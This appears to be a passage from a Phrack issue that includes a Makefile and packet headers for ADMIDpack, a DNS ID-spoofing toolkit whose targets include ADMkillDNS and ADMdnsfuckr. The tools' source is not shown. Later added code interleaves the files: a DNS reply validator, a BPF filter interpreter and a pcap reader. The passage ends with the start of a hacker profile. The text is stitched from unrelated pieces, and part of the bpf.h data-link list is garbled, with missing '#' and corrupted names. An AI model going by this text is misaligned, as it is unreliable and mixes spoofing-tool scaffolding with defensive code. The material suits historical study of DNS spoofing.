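/* Constructed reply: id 0x1234, QR/AA/RD/RA set, one question, one answer
 * "www.example.com A 192.0.2.1 TTL 86400", laid out as makepaketAW() does. */
static const uint8_t SAMPLE[] = {
    0x12,0x34, 0x85,0x80, 0x00,0x01, 0x00,0x01, 0x00,0x00, 0x00,0x00,
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0,
    0x00,0x01, 0x00,0x01,
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0,
    0x00,0x01, 0x00,0x01, 0x00,0x01,0x51,0x80, 0x00,0x04, 192,0,2,1
};

/* Check the first len bytes of SAMPLE against what the resolver remembers
 * (it sent the query to port 53 with transaction ID expect_id). */
int check_sample(int len, uint16_t src_port, uint16_t expect_id,
                 const char *qname, uint16_t qtype)
{
    struct pending_query q = { expect_id, 53, qname, qtype };
    return check_response(SAMPLE, len, src_port, &q);
}
```

Calling `check_sample(64, 53, 0x1234, "www.example.com", 1)` returns `DNS_OK`; the same packet with a guessed ID of 0x1235 or a source port of 1024 is rejected before the answer section is even parsed.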
<++> ADMIDpack/Makefile
# version 0.1
#/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS
SHELL = /bin/sh
# uncomment this if your are not on LinuX
#LIBS = -lsocket -lnsl -lpcap
CC = gcc

LIBS = -lpcap

BIN =

CFLAGS = -I. -L.

all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d

ADMkillDNS: ADMkillDNS.c
	$(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS

ADMsnOOfID: ADMsnOOfID.c
	$(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID

ADMsniffID: ADMsniffID.c
	$(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID

ADMdnsfuckr: ADMdnsfuckr.c
	$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr

ADMnOg00d: ADMnOg00d.c
	$(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d

clean:
	rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
	$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr

<-->

<++> ADMIDpack/bpf.h

/*-
 * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from the Stanford/CMU enet packet filter,
 * (net/enet.c) distributed as part of 4.3BSD, and code contributed
 * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
 * Berkeley Laboratory.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *      @(#)bpf.h	7.1 (Berkeley) 5/7/91
 *
 * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
 */

#ifndef BPF_MAJOR_VERSION

/* BSD style release date */
#define BPF_RELEASE 199606

typedef	int bpf_int32;
typedef	u_int bpf_u_int32;

/*
 * Alignment macros.  BPF_WORDALIGN rounds up to the next
 * even multiple of BPF_ALIGNMENT.
 */
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))

#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32

/*
 * Structure for BIOCSETF.
 */
struct bpf_program {
	u_int bf_len;
	struct bpf_insn *bf_insns;
};

/*
 * Struct returned by BIOCGSTATS.
 */
struct bpf_stat {
	u_int bs_recv;		/* number of packets received */
	u_int bs_drop;		/* number of packets dropped */
};

/*
 * Struct return by BIOCVERSION.  This represents the version number of
 * the filter language described by the instruction encodings below.
 * bpf understands a program iff kernel_major == filter_major &&
 * kernel_minor >= filter_minor, that is, if the value returned by the
 * running kernel has the same major number and a minor number equal
 * equal to or less than the filter being downloaded.  Otherwise, the
 * results are undefined, meaning an error may be returned or packets
 * may be accepted haphazardly.
 * It has nothing to do with the source code version.
 */
struct bpf_version {
	u_short bv_major;
	u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1

/*
 * BPF ioctls
 *
 * The first set is for compatibility with Sun's pcc style
 * header files.  If your using gcc, we assume that you
 * have run fixincludes so the latter set should work.
 */
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define	BIOCGBLEN	_IOR(B,102, u_int)
#define	BIOCSBLEN	_IOWR(B,102, u_int)
#define	BIOCSETF	_IOW(B,103, struct bpf_program)
#define	BIOCFLUSH	_IO(B,104)
#define BIOCPROMISC	_IO(B,105)
#define	BIOCGDLT	_IOR(B,106, u_int)
#define BIOCGETIF	_IOR(B,107, struct ifreq)
#define BIOCSETIF	_IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT	_IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT	_IOR(B,110, struct timeval)
#define BIOCGSTATS	_IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE	_IOW(B,112, u_int)
#define BIOCVERSION	_IOR(B,113, struct bpf_version)
#define BIOCSTCPF	_IOW(B,114, struct bpf_program)
#define BIOCSUDPF	_IOW(B,115, struct bpf_program)
#else
#define	BIOCGBLEN	_IOR('B',102, u_int)
#define	BIOCSBLEN	_IOWR('B',102, u_int)
#define	BIOCSETF	_IOW('B',103, struct bpf_program)
#define	BIOCFLUSH	_IO('B',104)
#define BIOCPROMISC	_IO('B',105)
#define	BIOCGDLT	_IOR('B',106, u_int)
#define BIOCGETIF	_IOR('B',107, struct ifreq)
#define BIOCSETIF	_IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT	_IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT	_IOR('B',110, struct timeval)
#define BIOCGSTATS	_IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE	_IOW('B',112, u_int)
#define BIOCVERSION	_IOR('B',113, struct bpf_version)
#define BIOCSTCPF	_IOW('B',114, struct bpf_program)
#define BIOCSUDPF	_IOW('B',115, struct bpf_program)
#endif

/*
 * Structure prepended to each packet.
 */
struct bpf_hdr {
	struct timeval	bh_tstamp;	/* time stamp */
	bpf_u_int32	bh_caplen;	/* length of captured portion */
	bpf_u_int32	bh_datalen;	/* original length of packet */
	u_short		bh_hdrlen;	/* length of bpf header (this struct
					   plus alignment padding) */
};
/*
 * Because the structure above is not a multiple of 4 bytes, some compilers
 * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
 * Only the kernel needs to know about it; applications use bh_hdrlen.
 */
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif

/*
 * Data-link level type codes.
 */
#define DLT_NULL	0	/* no link-layer encapsulation */
#define DLT_EN10MB	1	/* Ethernet (10Mb) */
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define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ 
define DLT_AX25 3 /* Amateur Radio AX.25 */ 

define DLT_PRONET 4 /* Proteon ProNET Token Ring */ 
define DLT_CHAOS 5 /* Chaos */ 

define DLT_IEEE802 6 /* IEEE 802 Networks */ 

define DLT_ARCNE a /* BRCNET */ 

define DLT_SLIP 8 /* Serial Line IP */ 

define DLT_PPP 9 /* Point-to-point Protocol */ 
define DLT_FDDI 10 /* FDDI */ 

define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */ 
define DLT_RAW 12 /* raw IP */ 

define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */ 
#define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */ 
/*
 * The instruction encodings.
 */
/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define         BPF_LD          0x00
#define         BPF_LDX         0x01
#define         BPF_ST          0x02
#define         BPF_STX         0x03
#define         BPF_ALU         0x04
#define         BPF_JMP         0x05
#define         BPF_RET         0x06
#define         BPF_MISC        0x07

/* ld/ldx fields */
#define BPF_SIZE(code)  ((code) & 0x18)
#define         BPF_W           0x00
#define         BPF_H           0x08
#define         BPF_B           0x10
#define BPF_MODE(code)  ((code) & 0xe0)
#define         BPF_IMM         0x00
#define         BPF_ABS         0x20
#define         BPF_IND         0x40
#define         BPF_MEM         0x60
#define         BPF_LEN         0x80
#define         BPF_MSH         0xa0

/* alu/jmp fields */
#define BPF_OP(code)    ((code) & 0xf0)
#define         BPF_ADD         0x00
#define         BPF_SUB         0x10
#define         BPF_MUL         0x20
#define         BPF_DIV         0x30
#define         BPF_OR          0x40
#define         BPF_AND         0x50
#define         BPF_LSH         0x60
#define         BPF_RSH         0x70
#define         BPF_NEG         0x80
#define         BPF_JA          0x00
#define         BPF_JEQ         0x10
#define         BPF_JGT         0x20
#define         BPF_JGE         0x30
#define         BPF_JSET        0x40
#define BPF_SRC(code)   ((code) & 0x08)
#define         BPF_K           0x00
#define         BPF_X           0x08

/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code)  ((code) & 0x18)
#define         BPF_A           0x10

/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define         BPF_TAX         0x00
#define         BPF_TXA         0x80

/*
 * The instruction data structure.
 */
struct bpf_insn {
        u_short code;
        u_char  jt;
        u_char  jf;
        bpf_int32 k;
};

/*
 * Macros for insn array initializers.
 */
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }

#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif

/*
 * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
 */
#define BPF_MEMWORDS 16

#endif
<-->
<++> ADMIDpack/dns.h
#define DNSHDRSIZE 12

struct dnshdr {
        unsigned short int id;

        unsigned        char rd:1;      /* recursion desired */
        unsigned        char tc:1;      /* truncated message */
        unsigned        char aa:1;      /* authoritive answer */
        unsigned        char opcode:4;  /* purpose of message */
        unsigned        char qr:1;      /* response flag */

        unsigned        char rcode:4;   /* response code */
        unsigned        char unused:2;  /* unused bits */
        unsigned        char pr:1;      /* primary server required (non standard) */
        unsigned        char ra:1;      /* recursion available */

        unsigned short int que_num;
        unsigned short int rep_num;
        unsigned short int num_rr;
        unsigned short int num_rrsup;
};
<-->
<++> ADMIDpack/ip.h
/* adapted from tcpdump */
#ifndef IPVERSION
#define IPVERSION 4
#endif /* IPVERSION */

struct iphdr {
        u_char  ihl:4,                  /* header length */
                version:4;              /* version */
        u_char  tos;                    /* type of service */
        short   tot_len;                /* total length */
        u_short id;                     /* identification */
        short   off;                    /* fragment offset field */
#define IP_DF 0x4000                    /* dont fragment flag */
#define IP_MF 0x2000                    /* more fragments flag */
        u_char  ttl;                    /* time to live */
        u_char  protocol;               /* protocol */
        u_short check;                  /* checksum */
        struct  in_addr saddr, daddr;   /* source and dest address */
};
#ifndef IP_MAXPACKET
#define IP_MAXPACKET 65535
#endif /* IP_MAXPACKET */
<--> 
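The instruction encoding in bpf.h and the dnshdr layout in dns.h above, exercised together in an added example of mine (not code from the page, from ADMIDpack or from libpcap): a hand-assembled filter that keeps only first-fragment UDP packets to port 53 on a DLT_EN10MB link, an interpreter for the subset of the encoding that filter uses, and a decoder for the DNS header of a frame the filter accepts. The BPF_* values and DNSHDRSIZE are the headers' own; the filter program, the frame bytes, bpf_run, dns_parse_header and classify_frame are constructed here.

```c
/* Added example (not code from the page or from ADMIDpack): an interpreter for
 * the subset of the bpf.h encoding that a hand-assembled "udp dst port 53"
 * filter needs, plus a portable decoder for the dnshdr flags that dns.h declares
 * as bit-fields.  BPF_* values are the header's; everything else is constructed. */
#include <stdint.h>
#include <string.h>

#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD   0x00
#define BPF_JMP  0x05
#define BPF_RET  0x06
#define BPF_SIZE(code)  ((code) & 0x18)
#define BPF_H    0x08
#define BPF_B    0x10
#define BPF_MODE(code)  ((code) & 0xe0)
#define BPF_ABS  0x20
#define BPF_OP(code)    ((code) & 0xf0)
#define BPF_JEQ  0x10
#define BPF_JSET 0x40
#define BPF_K    0x00
struct bpf_insn { uint16_t code; uint8_t jt; uint8_t jf; int32_t k; };
#define BPF_STMT(code, k)         { (uint16_t)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (uint16_t)(code), jt, jf, k }

/* "IPv4, UDP, not a later fragment, dst port 53" on DLT_EN10MB.  Offsets assume
 * a 20-byte IP header (ihl == 5); instruction 8 accepts, instruction 9 rejects. */
static const struct bpf_insn dns_filter[] = {
    BPF_STMT(BPF_LD | BPF_H | BPF_ABS, 12),             /* 0: A = ethertype       */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, 0x0800, 0, 7),  /* 1: IPv4? else -> 9     */
    BPF_STMT(BPF_LD | BPF_B | BPF_ABS, 23),             /* 2: A = IP protocol     */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, 17, 0, 5),      /* 3: UDP? else -> 9      */
    BPF_STMT(BPF_LD | BPF_H | BPF_ABS, 20),             /* 4: A = flags/frag off  */
    BPF_JUMP(BPF_JMP | BPF_JSET | BPF_K, 0x1fff, 3, 0), /* 5: offset != 0 -> 9    */
    BPF_STMT(BPF_LD | BPF_H | BPF_ABS, 36),             /* 6: A = UDP dst port    */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, 53, 0, 1),      /* 7: 53? else -> 9       */
    BPF_STMT(BPF_RET | BPF_K, 65535),                   /* 8: accept whole packet */
    BPF_STMT(BPF_RET | BPF_K, 0),                       /* 9: reject              */
};
#define DNS_FILTER_LEN (sizeof(dns_filter) / sizeof(dns_filter[0]))

/* Run a program the way bpf_filter() does: returns bytes to keep, 0 to drop.  A
 * load beyond the packet or an opcode outside the subset drops the packet, so the
 * interpreter never reads past the buffer. */
static unsigned bpf_run(const struct bpf_insn *prog, size_t n, const uint8_t *pkt, size_t len)
{
    uint32_t a = 0;
    size_t pc = 0;
    while (pc < n) {
        const struct bpf_insn *in = &prog[pc++];
        uint32_t k = (uint32_t)in->k;
        if (BPF_CLASS(in->code) == BPF_LD) {
            size_t w = BPF_SIZE(in->code) == BPF_B ? 1 : BPF_SIZE(in->code) == BPF_H ? 2 : 4;
            if (BPF_MODE(in->code) != BPF_ABS || k > len || len - k < w) return 0;
            for (a = 0; w > 0; w--, k++)               /* network byte order */
                a = (a << 8) | pkt[k];
        } else if (BPF_CLASS(in->code) == BPF_JMP) {
            int taken;
            if (BPF_OP(in->code) == BPF_JEQ)       taken = (a == k);
            else if (BPF_OP(in->code) == BPF_JSET) taken = (a & k) != 0;
            else return 0;
            pc += taken ? in->jt : in->jf;
        } else if (BPF_CLASS(in->code) == BPF_RET) {
            return k;                                   /* BPF_RET|BPF_K only */
        } else return 0;
    }
    return 0;
}

/* dnshdr flags decoded from the wire.  dns.h declares them as bit-fields, whose
 * packing order is compiler- and endian-dependent; decoding the 16-bit word is not. */
struct dns_flags { uint16_t id; unsigned qr, opcode, aa, tc, rd, ra, rcode; };

static int dns_parse_header(const uint8_t *p, size_t len, struct dns_flags *o)
{
    if (len < 12) return -1;                            /* DNSHDRSIZE */
    uint16_t flags = (uint16_t)((p[2] << 8) | p[3]);
    o->id = (uint16_t)((p[0] << 8) | p[1]);
    o->qr = (flags >> 15) & 1;  o->opcode = (flags >> 11) & 0xf;  o->aa = (flags >> 10) & 1;
    o->tc = (flags >> 9) & 1;   o->rd = (flags >> 8) & 1;         o->ra = (flags >> 7) & 1;
    o->rcode = flags & 0xf;
    return 0;
}

/* Constructed frame: Ethernet / IPv4 / UDP 49152->53 / DNS query, id 0x1a2b, RD set. */
static const uint8_t dns_query[54] = {
    0x00,0x11,0x22,0x33,0x44,0x55, 0x66,0x77,0x88,0x99,0xaa,0xbb, 0x08,0x00,
    0x45,0x00,0x00,0x28, 0x12,0x34,0x40,0x00, 0x40,0x11,0x00,0x00,
    0xc0,0xa8,0x01,0x02, 0xc0,0xa8,0x01,0x01, 0xc0,0x00,0x00,0x35, 0x00,0x14,0x00,0x00,
    0x1a,0x2b,0x01,0x00, 0x00,0x01,0x00,0x00, 0x00,0x00,0x00,0x00,
};

/* Filter, then decode the header behind 42 bytes of Ethernet + IP + UDP:
 * 1 = DNS header decoded, 0 = filter rejected the frame, -1 = accepted but short. */
static int classify_frame(const uint8_t *f, size_t len, struct dns_flags *d)
{
    if (bpf_run(dns_filter, DNS_FILTER_LEN, f, len) == 0) return 0;
    if (len < 42 || dns_parse_header(f + 42, len - 42, d) != 0) return -1;
    return 1;
}
```

Two caveats the headers leave implicit: the fixed offset 36 for the UDP port is only right when the IP header has no options, which is what BPF_LDX|BPF_B|BPF_MSH (4*(P[k]&0xf) into the index register) and BPF_IND loads exist for; and the bit-field order in dns.h (rd first) is how one compiler packs a byte on a little-endian host, so a decoder that must run anywhere reads the 16-bit flags word explicitly, as dns_parse_header does. A kernel additionally validates a program (in-range jump targets, every path ending in BPF_RET) before installing it; the toy interpreter simply drops a packet on anything it does not understand.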
<++> ADMIDpack/pcap.h
/*
 * Copyright (c) 1993, 1994, 1995, 1996, 1997
 *      The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by the Computer Systems
 *      Engineering Group at Lawrence Berkeley Laboratory.
 * 4. Neither the name of the University nor of the Laboratory may be used
 *    to endorse or promote products derived from this software without
 *    specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 * @(#) $Header: ... (LBL)
 */

#ifndef lib_pcap_h
#define lib_pcap_h

#include <sys/types.h>
#include <sys/time.h>

#include <bpf.h>

#include <stdio.h>

#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4

#define PCAP_ERRBUF_SIZE 256

/*
 * Compatibility for systems that have a bpf.h that
 * predates the bpf typedefs for 64-bit support.
 */
#if BPF_RELEASE - 0 < 199406
typedef int bpf_int32;
typedef u_int bpf_u_int32;
#endif

typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
 * The first record in the file contains saved values for some
 * of the flags used in the printout phases of tcpdump.
 * Many fields here are 32 bit ints so compilers won't insert unwanted
 * padding; these files need to be interchangeable across architectures.
 */
struct pcap_file_header {
        bpf_u_int32 magic;
        u_short version_major;
        u_short version_minor;
        bpf_int32 thiszone;     /* gmt to local correction */
        bpf_u_int32 sigfigs;    /* accuracy of timestamps */
        bpf_u_int32 snaplen;    /* max length saved portion of each pkt */
        bpf_u_int32 linktype;   /* data link type (DLT_*) */
};

/*
 * Each packet in the dump file is prepended with this generic header.
 * This gets around the problem of different headers for different
 * packet interfaces.
 */
struct pcap_pkthdr {
        struct timeval ts;      /* time stamp */
        bpf_u_int32 caplen;     /* length of portion present */
        bpf_u_int32 len;        /* length this packet (off wire) */
};

/*
 * As returned by the pcap_stats()
 */
struct pcap_stat {
        u_int ps_recv;          /* number of packets received */
        u_int ps_drop;          /* number of packets dropped */
        u_int ps_ifdrop;        /* drops by interface XXX not yet supported */
};

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
                             const u_char *);

char    *pcap_lookupdev(char *);
int     pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t  *pcap_open_live(char *, int, int, int, char *);
pcap_t  *pcap_open_offline(const char *, char *);
void    pcap_close(pcap_t *);
int     pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int     pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
        pcap_next(pcap_t *, struct pcap_pkthdr *);
int     pcap_stats(pcap_t *, struct pcap_stat *);
int     pcap_setfilter(pcap_t *, struct bpf_program *);
void    pcap_perror(pcap_t *, char *);
char    *pcap_strerror(int);
char    *pcap_geterr(pcap_t *);
int     pcap_compile(pcap_t *, struct bpf_program *, char *, int,
            bpf_u_int32);
/* XXX */
int     pcap_freecode(pcap_t *, struct bpf_program *);
int     pcap_datalink(pcap_t *);
int     pcap_snapshot(pcap_t *);
int     pcap_is_swapped(pcap_t *);
int     pcap_major_version(pcap_t *);
int     pcap_minor_version(pcap_t *);

/* XXX */
FILE    *pcap_file(pcap_t *);
int     pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void    pcap_dump_close(pcap_dumper_t *);
void    pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int   bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char    *bpf_image(struct bpf_insn *, int);

#endif

<--> 
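pcap_file_header and pcap_pkthdr in pcap.h above describe the tcpdump capture file layout, and the header's own remark that the fields are 32-bit ints so files stay interchangeable across architectures is exactly why a reader has to detect the writer's byte order from the magic number (what pcap_is_swapped() reports). The following added example is mine, not code from the page or from libpcap: it writes such a file into memory in either byte order and reads it back, refusing records whose caplen exceeds snaplen or runs past the buffer. The magic number, version 2.4 and DLT_EN10MB are libpcap's values; pcap_buf, pcap_rec, build_capture, count_records and the helper names are this example's own.

```c
/* Added example, not code from the page or from libpcap: writes the on-disk
 * layout of pcap_file_header and pcap_pkthdr into a buffer and reads it back,
 * recognising a byte-swapped file the way pcap_is_swapped() reports one.
 * Magic number and version 2.4 are libpcap's; the records are constructed. */
#include <stdint.h>
#include <string.h>

#define PCAP_MAGIC         0xa1b2c3d4u   /* reads as 0xd4c3b2a1 when swapped */
#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4
#define DLT_EN10MB         1
#define FILE_HDR_LEN       24            /* on-disk size of struct pcap_file_header */
#define PKT_HDR_LEN        16            /* on-disk size of struct pcap_pkthdr */

/* Explicit-endian field helpers; be != 0 means big-endian. */
static void put32(uint8_t *p, uint32_t v, int be)
{ for (int i = 0; i < 4; i++) p[be ? 3 - i : i] = (uint8_t)(v >> (8 * i)); }
static void put16(uint8_t *p, uint16_t v, int be)
{ p[be ? 1 : 0] = (uint8_t)v; p[be ? 0 : 1] = (uint8_t)(v >> 8); }
static uint32_t get32(const uint8_t *p, int be)
{ uint32_t v = 0; for (int i = 0; i < 4; i++) v |= (uint32_t)p[be ? 3 - i : i] << (8 * i); return v; }
static uint16_t get16(const uint8_t *p, int be)
{ return be ? (uint16_t)((p[0] << 8) | p[1]) : (uint16_t)((p[1] << 8) | p[0]); }

/* File header as a writer on a host of the given byte order lays it down. */
static size_t pcap_write_file_header(uint8_t *out, uint32_t snaplen, uint32_t linktype, int be)
{
    put32(out, PCAP_MAGIC, be);
    put16(out + 4, PCAP_VERSION_MAJOR, be);
    put16(out + 6, PCAP_VERSION_MINOR, be);
    put32(out + 8, 0, be);                  /* thiszone */
    put32(out + 12, 0, be);                 /* sigfigs */
    put32(out + 16, snaplen, be);
    put32(out + 20, linktype, be);
    return FILE_HDR_LEN;
}

/* One record: caplen is clipped to snaplen, len keeps the length off the wire. */
static size_t pcap_write_packet(uint8_t *out, uint32_t sec, uint32_t usec,
                                const uint8_t *data, uint32_t len, uint32_t snaplen, int be)
{
    uint32_t caplen = len < snaplen ? len : snaplen;
    put32(out, sec, be);        put32(out + 4, usec, be);
    put32(out + 8, caplen, be); put32(out + 12, len, be);
    memcpy(out + PKT_HDR_LEN, data, caplen);
    return PKT_HDR_LEN + caplen;
}

struct pcap_buf { const uint8_t *p; size_t len, off; int swapped; uint32_t snaplen, linktype; };
struct pcap_rec { uint32_t sec, usec, caplen, len; const uint8_t *data; };

/* Parse the file header.  Read little-endian, the magic is either PCAP_MAGIC or
 * its mirror image, which fixes the byte order of every later field.
 * Returns 0, or -1 for a short, non-pcap or unsupported-version file. */
static int pcap_open_buf(struct pcap_buf *r, const uint8_t *buf, size_t len)
{
    if (len < FILE_HDR_LEN) return -1;
    uint32_t magic = get32(buf, 0);
    if (magic == PCAP_MAGIC) r->swapped = 0;
    else if (magic == 0xd4c3b2a1u) r->swapped = 1;
    else return -1;
    if (get16(buf + 4, r->swapped) != PCAP_VERSION_MAJOR) return -1;
    r->snaplen = get32(buf + 16, r->swapped);
    r->linktype = get32(buf + 20, r->swapped);
    r->p = buf;  r->len = len;  r->off = FILE_HDR_LEN;
    return 0;
}

/* Next record: 1 = got one, 0 = clean end of file, -1 = truncated or corrupt.
 * A caplen above snaplen or beyond the buffer is rejected before it is used
 * for any copy or pointer arithmetic. */
static int pcap_next_rec(struct pcap_buf *r, struct pcap_rec *o)
{
    if (r->off == r->len) return 0;
    if (r->len - r->off < PKT_HDR_LEN) return -1;
    const uint8_t *h = r->p + r->off;
    o->sec = get32(h, r->swapped);        o->usec = get32(h + 4, r->swapped);
    o->caplen = get32(h + 8, r->swapped); o->len = get32(h + 12, r->swapped);
    if (o->caplen > r->snaplen || o->caplen > r->len - r->off - PKT_HDR_LEN) return -1;
    o->data = h + PKT_HDR_LEN;
    r->off += PKT_HDR_LEN + o->caplen;
    return 1;
}

/* Build a two-record capture (snaplen 64) in the given byte order: a 20-byte
 * frame that fits and a 100-byte frame that gets clipped.  Writes 140 bytes. */
static size_t build_capture(uint8_t *buf, int be)
{
    uint8_t frame[100];
    memset(frame, 0xab, sizeof frame);                      /* constructed payload */
    size_t n = pcap_write_file_header(buf, 64, DLT_EN10MB, be);
    n += pcap_write_packet(buf + n, 1, 500, frame, 20, 64, be);
    n += pcap_write_packet(buf + n, 2, 0, frame, 100, 64, be);
    return n;
}

/* Walk a capture; returns the record count, or -1 if any record is bad. */
static int count_records(const uint8_t *buf, size_t len, struct pcap_rec *last)
{
    struct pcap_buf r;
    int n = 0, rc;
    if (pcap_open_buf(&r, buf, len) != 0) return -1;
    while ((rc = pcap_next_rec(&r, last)) == 1) n++;
    return rc == 0 ? n : -1;
}
```

The on-disk record header is 16 bytes (two 32-bit timestamp words, caplen, len), which is not sizeof(struct pcap_pkthdr) on a host whose struct timeval is 16 bytes; that is why the example spells the layout out field by field instead of writing the struct. The caplen check in pcap_next_rec is the one that matters when a capture comes from an untrusted source: a parser that trusts caplen before comparing it to snaplen and to the bytes left in the file will copy or index past its buffer.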


<++> ADMIDpack/udp.h 
struct udphdr {
        u_short source;         /* source port */
        u_short dest;           /* destination port */
        u_short len;            /* udp length */
        u_short check;          /* udp checksum */
};
<-->
[ P H R A C K   5 2   P R O P H I L E

[ Personal

             Handle: O00
           Call him: pachuco. Hey... me.
       Past handles: digital jesus
      Handle origin: L. Ron Hubbard and I thought it up.
      Date of Birth: 07/74
             Height: With heels or without?
             Weight: In the sixth grade I was in a roman play. I was Naples.
          Eye color: Blue.
         Hair Color: Blue. I'm old.
